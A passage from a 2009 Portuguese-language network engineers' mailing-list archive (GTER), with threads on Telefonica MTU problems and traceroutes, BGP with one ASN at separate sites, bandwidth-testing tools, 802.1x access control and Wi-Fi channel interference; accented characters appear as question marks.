n?o consegui. > > > > Segue um traceroute de um cliente at? o meu servidor > > > > 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms > > 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms > > 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * > > 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms > > 211.082 ms 208.803 ms > > 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms > > 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms > > 207.880 ms 208.880 ms > > 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 ms > > 210.797 ms 212.841 ms > > 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms > > 187.203 ms 193.537 ms > > 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) > > 183.577 ms 211.051 ms 182.280 ms > > 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) > > 178.779 ms 181.512 ms 179.809 ms > > 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 > ms > > 308.261 ms > > 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms > 201.248 > > ms > > > > -- > > gter list https://eng.registro.br/mailman/listinfo/gter > > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From renato.diogo at gmail.com Tue Jun 16 09:28:10 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Tue, 16 Jun 2009 09:28:10 -0300 Subject: [GTER] =?iso-8859-1?q?Mensura=E7=E3o_da_Rede?= In-Reply-To: <4A370A1B.6060002@onda.psi.br> References: <1245093684.4865.4.camel@giba-ti.selbetti.local> <4A370A1B.6060002@onda.psi.br> Message-ID: <724d72960906160528p11fdb251w900305b2b212b08c@mail.gmail.com> Se for para teste de velocidade de rede, tem tamb?m o iperf, que ? semelhante ao bandwidthtest. Sei que tem vers?o pra linux e uma vers?o portada para java para rodar em Windows. http://iperf.sourceforge.net/ http://www.noc.ucf.edu/Tools/Iperf/ http://sourceforge.net/projects/iperf Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/15 Alexandre J. Correa - Onda Internet : > www.mikrotik.com > > tem o bandwidth test .. muito bom para testar troughput de rede... roda em > windows.. basta rodar o software nas 2 pontas e testar :) > > Gilberto Nunes wrote: >> >> Boa tarde >> >> Pessoal da Lista >> Por gentileza Senhores >> >> Estou procurando por ferramentas que possa me mostrar a medi??o de >> performance de rede entre hosts e entre estes e a Rede Interna/Externa >> Obrigado >> >> Gilberto Nunes Ferreira >> TI >> Selbetti Gest?o de Documentos >> Telefone: +55 (47) 3441-6004 >> Celular: +55 (47) 8861-6672 >> >> >> >> >> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter > > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter From frederick at dahype.org Tue Jun 16 09:30:23 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 16 Jun 2009 08:30:23 -0400 Subject: [GTER] RES: RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: Obrigado Matheus, vou tentar insistir mais um pouco com eles, creio que deva ser o que foi falado aqui mesmo, configura??o fora do dia-a-dia mais dificuldade comercial. > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Matheus Cucoloto > Enviada em: segunda-feira, 15 de junho de 2009 18:13 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: BGP Diferentes localidades > > Renato, funciona sim n?o tem o porque de n?o funcionar. > > Eu mesmo tenho duas sess?es com a mesma operadora mas em links de > Internet diferentes. > > Na sess?o BGP a unica diferen?a ? que fa?o anuncios diferentes. > > Pode ser que a operadora n?o esta querendo fazer porque os seus dois > links vao fazer sess?o no mesmo router. > > Ai talvez alguma coisa pode dar errado ou impossibiliteo projeto. > > > ? o que eu imagino. > > > Porem ja levantei duas sess?es BGP com a BRT em dois links de Internet > Diferente mas com o Mesmo AS e o mesmo NEIGHBOR e funcionou sim. > > Abra?os. > > From frederick at dahype.org Tue Jun 16 09:33:17 2009 From: frederick at dahype.org (Renato Frederick) Date: Tue, 16 Jun 2009 08:33:17 -0400 Subject: [GTER] RES: RES: BGP Diferentes localidades In-Reply-To: References: Message-ID: Danton, supondo que eu fa?a uma VPN IPSEC, eu teria que garantir que nenhum trafego destinado ao provedor A chegue pelo B, pois o B n?o ? nem 1/2 do link A.. N?o seria o t?nel in?til no caso? Infelizmente eu estou precisando quebrar as regras, ou ? poss?vel o registro.br fornecer ASN sem IP? E eu usar parte de um bloco IP de outro ASN neste novo AS? Acho que n?o, correto? > -----Mensagem original----- > De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] > Em nome de Danton Nunes > Enviada em: segunda-feira, 15 de junho de 2009 20:44 > Para: Grupo de Trabalho de Engenharia e Operacao de Redes > Assunto: Re: [GTER] RES: BGP Diferentes localidades > > On Mon, 15 Jun 2009, Renato Frederick wrote: > > > Entao Danton, acontece que eles n?o comunicam entre si n?o. > > ent?o d? um jeito de comunicar, p.ex. t?nel. se eles n?o formam um todo > conexo n?o deveriam ficar no mesmo AS. Pela defini??o da RFC1930: > > An AS is a connected group of one or more IP prefixes run by one > or more network operators which has a SINGLE and CLEARLY DEFINED > routing policy. > > Viu a palavra 'connected'? As pol?ticas de que fala essa RFC dizem > respeito ao tr?fego entre ASs e n?o entre roteadores. Os an?ncios s?o > entre ASs e n?o s? entre roteadores. A pol?tica tem que ser a mesma em > todos os pontos onde dois ASs trocam figurinhas. Porisso o que voc? > quer > fazer est? violando a RFC 1930, tamb?m conhecida como BCP 6. > > > A realidade ? esta, a outra localidade ? bem menor e um /24 atende. > N?o > > justifica solicitar um AS para l?, mas tamb?m ela n?o tem conex?o com > o > > ponto principal. > > se voc? quer anunciar esse /24 (note que sou contra isso!) e ele n?o ? > conexo com os outros blocos, o mais razo?vel ? ter outro n?mero de AS. > pois se voc? tem pol?ticas diferentes nos dois pontos, de acordo com a > BCP > 6 tem que ter sistemas aut?nomos diferentes. > > > Na verdade nem interessa ter conex?o com o ponto principal, seria > > interessante usar l? como redund?ncia f?sica, mas ? invi?vel montar > um > > link entre os 2 > > e um link virtual? isso n?o custa nada. > > > Mas e se for o mesmo provedor tanto l? quanto aqui? Tecnicamente, > dentro > > do backbone deles, eles saberiam direcionar a requisi??o para aquele > IP > > a partir da outra sess?o BGP? Eu creio que sim, mas da? que surgiu > minha > > d?vida! > > se for o mesmo provedor ele pode se achar no direito - e estar? certo > em > fazer isso - em rotear qualquer dos seus blocos por qualquer dos seus > roteadores, uma vez que sendo do mesmo sistema aut?nomo, pela defini??o > da > BCP 6, por hip?tese eles saber?o se virar para passar o pacote de um > para > o outro lado. Note que uma rota BGP ? uma lista da ASs, n?o um prefixo > + > um IP de destino. > -- > gter list https://eng.registro.br/mailman/listinfo/gter From renato.diogo at gmail.com Tue Jun 16 09:42:10 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Tue, 16 Jun 2009 09:42:10 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <84eb7a820906160422r13684d77jd8c65dc14ed57331@mail.gmail.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <84eb7a820906160422r13684d77jd8c65dc14ed57331@mail.gmail.com> Message-ID: <724d72960906160542n5c41bc22wd9e26380a4e1e75e@mail.gmail.com> Temos um link com a telefonica e estamos com este problema (desde abril). O pior ? tentar convencer eles que o problema ? na rede deles. Aqui tivemos que modificar o MSS dos pacotes TCP para diminuir o tamanho do pacote... para minimizar o problema. Aqui nem a praga do MSN ficava em p?... A navega??o fica p?ssima... Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/16 Diogo Montagner : > Certa vez eu tive que baixar a mtu de um windows vista que estava utilizando > um discador pppoe para poder acessar sites como hotmail e aplica??es como > MSN. O engra?ado que isto somente acontecia com o Windows Vista. Como o uso > do Vista era tempor?rio, nunca investiguei a fundo o porqu? disso estar > acontecendo. Mas o link abaixo mostra que o problema n?o era (ou ?) novo. > http://www.asterisko.com.br/vista-speedy-e-mtu/ > > []s > ./diogo -montagner > > > 2009/6/16 Leandro Keffer > >> Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no >> link telefonica, a qual alega nao ter nenhuma problema >> O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, >> mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, >> tentarei em um horario idle da empresa para muar o mtu e fazer o teste com >> o >> ip anterior que ocorria o problema >> >> >> 2009/6/15 Felipe Rayel >> >> > >> > Ser? que alguem aqui est? tendo o mesmo problema que eu? >> > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail >> > ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e >> > trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem >> o >> > teste com o telnet na porta 110 e ocorre o mesmo problema. >> > >> > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O >> voip >> > que ? via UDP funciona normalmente. >> > >> > J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes >> > n?o detecta este problema, pois eles conseguem navegar normalmente. O >> > problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser >> > problema aqui, pois os demais clientes na BRtelecom, etc, ?n?o tem tido >> este >> > problema. >> > >> > Para fazer um teste, eu modifquei o MTU ?de um cliente e deixei fixo em >> > 1350.. Curiosamente passou a funcionar tudo. >> > >> > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a >> > Telefonica? Visto que pelo 0800 n?o consegui. >> > >> > Segue um traceroute de um cliente at? o meu servidor >> > >> > 1 ?192.168.254.254 (192.168.254.254) ?0.334 ms ?0.290 ms ?0.278 ms >> > 2 ?192.168.32.1 (192.168.32.1) ?51.917 ms ?30.002 ms ?30.801 ms >> > 3 ?201-0-4-65.dsl.telesp.net.br (201.0.4.65) ?29.254 ms * * >> > 4 ?pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) ?200.104 ms >> > ?211.082 ms ?208.803 ms >> > 5 ?200.223.44.1 (200.223.44.1) ?197.610 ms ?203.722 ms ?201.464 ms >> > 6 ?pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) ?208.188 ms >> > ?207.880 ms ?208.880 ms >> > 7 ?pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) ?209.118 ms >> > ?210.797 ms ?212.841 ms >> > 8 ?pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) ?184.772 ms >> > ?187.203 ms ?193.537 ms >> > 9 ?gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) >> > ?183.577 ms ?211.051 ms ?182.280 ms >> > 10 ?gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) >> > ?178.779 ms ?181.512 ms ?179.809 ms >> > 11 ?20118020002.host.telemar.net.br (201.18.20.2) ?224.655 ms ?312.999 >> ms >> > ?308.261 ms >> > 12 ?gelo.fertimitsui.com.br (201.18.21.3) ?209.396 ms ?199.956 ms >> ?201.248 >> > ms >> > >> > -- >> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > -- > gter list ? ?https://eng.registro.br/mailman/listinfo/gter > From renato.diogo at gmail.com Tue Jun 16 09:43:19 2009 From: renato.diogo at gmail.com (Renato de Oliveira Diogo) Date: Tue, 16 Jun 2009 09:43:19 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <724d72960906160542n5c41bc22wd9e26380a4e1e75e@mail.gmail.com> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> <84eb7a820906160422r13684d77jd8c65dc14ed57331@mail.gmail.com> <724d72960906160542n5c41bc22wd9e26380a4e1e75e@mail.gmail.com> Message-ID: <724d72960906160543j1ef167f3m45f50a98f4e86bdd@mail.gmail.com> Outra coisa, verifique nos seus firewall se n?o est? sendo barrado o protocolo ICMP tipo3, c?digo 4, que influencia nisso tamb?m... esse ICMP 3,4 deve estar liberado... Atenciosamente ________________________________________________ Renato de Oliveira Diogo Bacharel em Ci?ncia da Computa??o UNESP - Bauru LPIC1 - Linux Professional Institute Certification - N?vel 1 renato.diogo at gmail.com renato.diogo at yahoo.com.br 2009/6/16 Renato de Oliveira Diogo : > Temos um link com a telefonica e estamos com este problema (desde > abril). O pior ? tentar convencer eles que o problema ? na rede deles. > > Aqui tivemos que modificar o MSS dos pacotes TCP para diminuir o > tamanho do pacote... para minimizar o problema. Aqui nem a praga do > MSN ficava em p?... A navega??o fica p?ssima... > > Atenciosamente > ________________________________________________ > Renato de Oliveira Diogo > > Bacharel em Ci?ncia da Computa??o > UNESP - Bauru > > LPIC1 - Linux Professional Institute Certification - N?vel 1 > > renato.diogo at gmail.com > renato.diogo at yahoo.com.br > > > > 2009/6/16 Diogo Montagner : >> Certa vez eu tive que baixar a mtu de um windows vista que estava utilizando >> um discador pppoe para poder acessar sites como hotmail e aplica??es como >> MSN. O engra?ado que isto somente acontecia com o Windows Vista. Como o uso >> do Vista era tempor?rio, nunca investiguei a fundo o porqu? disso estar >> acontecendo. Mas o link abaixo mostra que o problema n?o era (ou ?) novo. >> http://www.asterisko.com.br/vista-speedy-e-mtu/ >> >> []s >> ./diogo -montagner >> >> >> 2009/6/16 Leandro Keffer >> >>> Amigo, tenho o mesmo problema em um cliente .... problema com porta 110 no >>> link telefonica, a qual alega nao ter nenhuma problema >>> O que fiz foi trocar por outro ip da faixa dela e resolveu aparentemente, >>> mas demorou at? eles sugerirem esta id?ia, porem n?o sei o que ocorre, >>> tentarei em um horario idle da empresa para muar o mtu e fazer o teste com >>> o >>> ip anterior que ocorria o problema >>> >>> >>> 2009/6/15 Felipe Rayel >>> >>> > >>> > Ser? que alguem aqui est? tendo o mesmo problema que eu? >>> > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar e-mail >>> > ou acessar o site do meu servidor. O outlook come?a a baixar os e-mails e >>> > trava. Igual como se o MTU n?o estivesse correto. Ja pedi para realizarem >>> o >>> > teste com o telnet na porta 110 e ocorre o mesmo problema. >>> > >>> > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O >>> voip >>> > que ? via UDP funciona normalmente. >>> > >>> > J? tentamos ligar na telefonica, s? que o checklist padr?o dos atendentes >>> > n?o detecta este problema, pois eles conseguem navegar normalmente. O >>> > problema s? ocorre com o meu servidor. J? descartei a hip?tese de ser >>> > problema aqui, pois os demais clientes na BRtelecom, etc, ?n?o tem tido >>> este >>> > problema. >>> > >>> > Para fazer um teste, eu modifquei o MTU ?de um cliente e deixei fixo em >>> > 1350.. Curiosamente passou a funcionar tudo. >>> > >>> > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a >>> > Telefonica? Visto que pelo 0800 n?o consegui. >>> > >>> > Segue um traceroute de um cliente at? o meu servidor >>> > >>> > 1 ?192.168.254.254 (192.168.254.254) ?0.334 ms ?0.290 ms ?0.278 ms >>> > 2 ?192.168.32.1 (192.168.32.1) ?51.917 ms ?30.002 ms ?30.801 ms >>> > 3 ?201-0-4-65.dsl.telesp.net.br (201.0.4.65) ?29.254 ms * * >>> > 4 ?pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) ?200.104 ms >>> > ?211.082 ms ?208.803 ms >>> > 5 ?200.223.44.1 (200.223.44.1) ?197.610 ms ?203.722 ms ?201.464 ms >>> > 6 ?pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) ?208.188 ms >>> > ?207.880 ms ?208.880 ms >>> > 7 ?pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) ?209.118 ms >>> > ?210.797 ms ?212.841 ms >>> > 8 ?pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) ?184.772 ms >>> > ?187.203 ms ?193.537 ms >>> > 9 ?gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br (201.18.252.110) >>> > ?183.577 ms ?211.051 ms ?182.280 ms >>> > 10 ?gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br (201.18.251.196) >>> > ?178.779 ms ?181.512 ms ?179.809 ms >>> > 11 ?20118020002.host.telemar.net.br (201.18.20.2) ?224.655 ms ?312.999 >>> ms >>> > ?308.261 ms >>> > 12 ?gelo.fertimitsui.com.br (201.18.21.3) ?209.396 ms ?199.956 ms >>> ?201.248 >>> > ms >>> > >>> > -- >>> > gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> > >>> -- >>> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >>> >> -- >> gter list ? ?https://eng.registro.br/mailman/listinfo/gter >> > From danton at inexo.com.br Tue Jun 16 09:51:26 2009 From: danton at inexo.com.br (Danton Nunes) Date: Tue, 16 Jun 2009 09:51:26 -0300 (BRT) Subject: [GTER] RES: BGP Diferentes localidades In-Reply-To: <4A36DF0E.2090809@rline.com.br> References: <4A36DF0E.2090809@rline.com.br> Message-ID: On Mon, 15 Jun 2009, Rosauro - RLINE wrote: > aproveitando o gancho, eu talvez at? teria uma situa??o parecida com essa, > mas para anunciar um bloco /22. voc? comentou que um link virtual n?o custa > nada. mas numa situa??o desta qdo o trafego fosse roteado para o ponto > "errado" teria de voltar por este tunel, ai no caso nao estaria consumindo o > dobro de banda do circuito ? sim, mas esse ? um quebra-galho para quando um dos enlaces falha. caso contr?rio a m?trica menor ser? respeitada e as coisas entrar?o pelo lado certo. o importante ? que o sistema aut?nomo seja coeso, isto ?, que qualquer coisa que entre por qualquer de suas interfaces atinja o destino, mesmo que seja em lombo de burro. Ok, algu?m pode argumentar que a BCP 6 ? apenas um guia de melhores pr?ticas e n?o uma norma, mas n?o seguir as melhores pr?ticas ? o caminho para os piores resultados. From danton at inexo.com.br Tue Jun 16 10:09:31 2009 From: danton at inexo.com.br (Danton Nunes) Date: Tue, 16 Jun 2009 10:09:31 -0300 (BRT) Subject: [GTER] BGP Diferentes localidades Message-ID: On Tue, 16 Jun 2009, Renato Frederick wrote: > Danton, supondo que eu fa?a uma VPN IPSEC, eu teria que garantir que nenhum > trafego destinado ao provedor A chegue pelo B, pois o B n?o ? nem 1/2 do > link A.. voc? n?o tem como garantir isso. > N?o seria o t?nel in?til no caso? Infelizmente eu estou precisando quebrar > as regras, ou ? poss?vel o registro.br fornecer ASN sem IP? n?o, porque ele daria a coes?o que o sistema aut?nomo deve ter pela defini??o da BCP 6. Quanto ao fornecimento de outro ASN, consulte o registro.br. Tecnicamente seria a solu??o correta. Voc? tamb?m pode negociar com seus provedores outro mecanismo, tipo rotas est?ticas ou o uso de ASN privativo. > E eu usar parte de um bloco IP de outro ASN neste novo AS? Acho que n?o, > correto? alta chance de dar besteira. n?o se esque?a de que muita gente filtra e sumariza blocos pequenos. ent?o esteja preparado para encrencas dific?limas de diagnosticar. From MBORBA at trf3.jus.br Tue Jun 16 13:26:12 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Tue, 16 Jun 2009 13:26:12 -0300 Subject: [GTER] =?windows-1252?q?seguran=E7a_de_acesso_fisico_na_rede?= In-Reply-To: References: <4A3698F5.9090804@onda.psi.br> Message-ID: <4A379D74.15A6.0046.0@trf3.jus.br> ..e compat?veis com autentica??o 802.1x. Uma solu??o tamb?m seria o uso de NAC, mas isso ? bem complexo, depende de agentes nas esta??es, pol?ticas de "compliance" internas... -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- Em 15/6/2009 ?s 15:58, Itamar Reis Peixoto gravou: > basicamente e' isto. > > > aconselho tamb?m que ele troque todos os seus switch's por swiches > gerenciaveis > > > 2009/6/15 Alexandre J. Correa - Onda Internet : >> Boa tarde !! >> >> Um cliente andou me questionando sobre acesso 'fisico' a rede dele, ele me >> explicou a seguinte situa??o: >> >> - Uma pessoa conecta um notebook em alguma tomada de rede, ele tem um dhcp >> na rede onde atribui ips automaticamente... esta maquina vai ficar fora do >> DOMINIO da rede sem acesso a documentos etc etc.. >> >> a preocupa??o dele ? NAO permitir aquela maquina de maneira alguma acessar >> nada, mesmo a pessoa colocando um ip manualmente... >> >> para este caso sugeri autentica??o via 802.1x de todas as esta??es, >> incluindo o switch fazer a autentica??o em um servidor central de chaves >> usando radius... >> >> existem outras possibilidades ? >> >> uma outra solu??o que ele me questionou foi: Existe uma maneira de filtrar >> quais macs podem conectar fisicamente naquelas portas ? >> >> resumindo, ele precisa permitir conexao fisica somente a maquinas >> autorizadas .. alguem conhece alguma solu??o ? >> >> >> obrigado !! >> >> -- >> Sds. >> >> Alexandre Jeronimo Correa >> >> Onda Internet >> www.onda.net.br >> IPV6 READY ! >> >> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> > > From raphaelbscosta at gmail.com Tue Jun 16 16:48:17 2009 From: raphaelbscosta at gmail.com (Raphael Costa) Date: Tue, 16 Jun 2009 16:48:17 -0300 Subject: [GTER] MTU x Telefonica In-Reply-To: <4A363CAB.6080908@fertimitsui.com.br> References: <4A33AE1B.7010106@jarruda.com> <4A35976A.5060608@jarruda.com> <4A363CAB.6080908@fertimitsui.com.br> Message-ID: <1245181697.13436.17.camel@inuyasha> Entramos em um loop infinito aqui: 1 - Reclamamos. 2 - Telefonica diz que n?o encontrou nada e sobe para a TIWS. 3 - TIWS diz que nao encontrou nada. 4 - Telefonica liga informando que a TIWS mexeu em algo (famoso roteador de Santos) e pede para testar. 5 - Tudo funciona por umas horas e o problema volta a ocorrer. 6 - Voltamos ao item #1. :-) On Mon, 2009-06-15 at 09:20 -0300, Felipe Rayel wrote: > Ser? que alguem aqui est? tendo o mesmo problema que eu? > Faz um semana que usu?rios na rede telef?nica n?o conseguem baixar > e-mail ou acessar o site do meu servidor. O outlook come?a a baixar os > e-mails e trava. Igual como se o MTU n?o estivesse correto. Ja pedi para > realizarem o teste com o telnet na porta 110 e ocorre o mesmo problema. > > O mais estranho ? que notei que isso ocorre apenas em conex?es TCP. O > voip que ? via UDP funciona normalmente. > > J? tentamos ligar na telefonica, s? que o checklist padr?o dos > atendentes n?o detecta este problema, pois eles conseguem navegar > normalmente. O problema s? ocorre com o meu servidor. J? descartei a > hip?tese de ser problema aqui, pois os demais clientes na BRtelecom, > etc, n?o tem tido este problema. > > Para fazer um teste, eu modifquei o MTU de um cliente e deixei fixo em > 1350.. Curiosamente passou a funcionar tudo. > > Alguem sabe como posso solucionar isso ou tentar entrar em contato com a > Telefonica? Visto que pelo 0800 n?o consegui. > > Segue um traceroute de um cliente at? o meu servidor > > 1 192.168.254.254 (192.168.254.254) 0.334 ms 0.290 ms 0.278 ms > 2 192.168.32.1 (192.168.32.1) 51.917 ms 30.002 ms 30.801 ms > 3 201-0-4-65.dsl.telesp.net.br (201.0.4.65) 29.254 ms * * > 4 pos13-3-vlm-sp-rotb-01.telemar.net.br (200.187.130.25) 200.104 ms > 211.082 ms 208.803 ms > 5 200.223.44.1 (200.223.44.1) 197.610 ms 203.722 ms 201.464 ms > 6 pos3-0-0-vlm-sp-rotn-h01.telemar.net.br (201.18.246.6) 208.188 ms > 207.880 ms 208.880 ms > 7 pos4-0-0-vlo-sp-rotn-h01.telemar.net.br (201.18.249.106) 209.118 > ms 210.797 ms 212.841 ms > 8 pos5-0-0-mpi-mg-rotn-h01.telemar.net.br (201.18.246.58) 184.772 ms > 187.203 ms 193.537 ms > 9 gigabitethernet1-0-0-mpi-mg-rotd-h01.telemar.net.br > (201.18.252.110) 183.577 ms 211.051 ms 182.280 ms > 10 gigabitethernet0-0-0-mpi-mg-rota-h01.telemar.net.br > (201.18.251.196) 178.779 ms 181.512 ms 179.809 ms > 11 20118020002.host.telemar.net.br (201.18.20.2) 224.655 ms 312.999 > ms 308.261 ms > 12 gelo.fertimitsui.com.br (201.18.21.3) 209.396 ms 199.956 ms > 201.248 ms > > -- > gter list https://eng.registro.br/mailman/listinfo/gter From edinilson at atinet.com.br Wed Jun 17 10:44:24 2009 From: edinilson at atinet.com.br (Edinilson - ATINET) Date: Wed, 17 Jun 2009 10:44:24 -0300 Subject: [GTER] Banda larga clandestina substitui lan houses na periferia de SP Message-ID: http://g1.globo.com/Noticias/SaoPaulo/0,,MUL1190644-5605,00-BANDA+LARGA+CLANDESTINA+SUBSTITUI+LAN+HOUSES+NA+PERIFERIA+DE+SP.html From MBORBA at trf3.jus.br Wed Jun 17 13:48:14 2009 From: MBORBA at trf3.jus.br (MARLON BORBA) Date: Wed, 17 Jun 2009 13:48:14 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. Message-ID: <4A38F3DE.15A6.0046.0@trf3.jus.br> Srs., Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da GTER. Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na maior parte do tempo estou conectado. No entanto, em alguns instantes, acontecem inexplic?veis quedas da comunica??o. A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? tenho divis?rias finas entre a sala onde est? o AP e a minha). Executando uma ferramenta de "sniffing" constato que, na mesma hora das quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. Paulista :P) operando no mesmo canal, que ? o 6. Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? -- Abra?os, Marlon Borba, CISSP, APC DataCenter Associate T?cnico Judici?rio ? Seguran?a da Informa??o Comiss?o Local de Resposta a Incidentes - CLRI TRF 3 Regi?o (11) 3012-1581 -- Practically no IT system is risk free. (NIST Special Publication 800-30) -- From emiliano.martins at ik1.com.br Wed Jun 17 13:55:20 2009 From: emiliano.martins at ik1.com.br (Emiliano Martins) Date: Wed, 17 Jun 2009 13:55:20 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <9c0c824e0906170955j246525d0rf540c638b5525f4a@mail.gmail.com> Marlon, N?o sei te explicar exatamente porque, mas na pr?tica acontece de um outro AP ou at? mesmo um telefone sem fio derrubar a sua conex?o wireless se estiver no mesmo canal, e a grande maioria dos APs e Telefones sem fio ou vem configurados de f?brica no canal 6 ou no 11. Eu sempre uso 8ou 9 para evitar esse tipo de problema. Mas ? sempre bom dar uma "sniffada" na ?rea antes de escolher qual canal usar. Abra?o 2009/6/17 MARLON BORBA > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da Cisco. Na > maior parte do tempo estou conectado. No entanto, em alguns instantes, > acontecem inexplic?veis quedas da comunica??o. > > A esta??o (de laborat?rio) ? um Vista SP1 32bits, usando uma placa de > rede "wireless" PCI da D-Link. Estou certo de que o sistema operacional > e os "drivers" est?o atualizados. As configura??es tamb?m est?o corretas > (SSID, criptografia, passphrase etc). A rela??o sinal-ru?do est? OK (s? > tenho divis?rias finas entre a sala onde est? o AP e a minha). > > Executando uma ferramenta de "sniffing" constato que, na mesma hora das > quedas, h? alguns APs de outras empresas pr?ximas deste pr?dio (na Av. > Paulista :P) operando no mesmo canal, que ? o 6. > > Pergunta de leigo na ?rea de Wi-Fi: "Clash" de freq??ncias ? uma causa > para desconex?o? Seria o caso de trocar o canal do nosso AP, digamos > para o 8 (no qual, at? onde percebi, nenhum ponto pr?ximo opera)? > > > -- > > Abra?os, > > Marlon Borba, CISSP, APC DataCenter Associate > T?cnico Judici?rio ? Seguran?a da Informa??o > Comiss?o Local de Resposta a Incidentes - CLRI > TRF 3 Regi?o > (11) 3012-1581 > -- > Practically no IT system is risk free. > (NIST Special Publication 800-30) > -- > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Emiliano Martins iK1 Tecnologia Ltda From alexandre at onda.psi.br Wed Jun 17 13:59:34 2009 From: alexandre at onda.psi.br (Alexandre J. Correa - Onda Internet) Date: Wed, 17 Jun 2009 13:59:34 -0300 Subject: [GTER] "Clash" de canais no Wi-Fi. In-Reply-To: <4A38F3DE.15A6.0046.0@trf3.jus.br> References: <4A38F3DE.15A6.0046.0@trf3.jus.br> Message-ID: <4A3920F6.5030007@onda.psi.br> exatamente, a maioria destes radios 'soho' o canal padrao ? o 6 .. fa?a o teste no canal 8.. e veja se resolve... :) MARLON BORBA wrote: > Srs., > > Como n?o sou um profundo conhecedor de Wi-Fi, recorro aos "gurus" da > GTER. > > Pr?ximo da minha mesa, a uns 10 metros no m?ximo, h? um AP da 